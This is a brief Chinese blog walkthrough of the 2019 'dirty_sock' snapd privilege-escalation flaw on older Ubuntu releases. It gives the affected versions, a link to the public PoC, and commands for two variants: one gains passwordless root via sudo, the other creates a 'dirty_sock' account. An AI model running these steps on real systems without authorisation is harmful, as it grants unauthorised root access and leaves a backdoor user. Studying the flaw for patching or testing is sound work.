标签:LTS 7304 漏洞 提权 2019 dirty Ubuntu sch01ar com
漏洞描述:
Ubuntu 版本:
Ubuntu 18.10
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 LTS
2.28 < snapd < 2.37 会存在该漏洞
Poc Github:https://github.com/initstring/dirty_sock
#1
注册并登陆,https://login.ubuntu.com/ 在 Ubuntu 上,生成密钥ssh-keygen -t rsa -C "your_email@example.com"
查看公钥
将公钥复制到网站上
接下来执行 poc
python3 ./dirty_sockv1.py -u "sch01ar@163.com" -k "../.ssh/id_rsa"执行完之后 sch01ar 被修改为 Ubuntu 上的用户名
接着切换为 root 用户
sudo -i
切换成 root 用户时不需要输入密码
#2
直接运行脚本
python3 dirty_sockv2.py
执行完会生成一个 dirty_sock 的用户,密码也是这个
标签:LTS,7304,漏洞,提权,2019,dirty,Ubuntu,sch01ar,com 来源: https://www.cnblogs.com/sch01ar/p/10453368.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。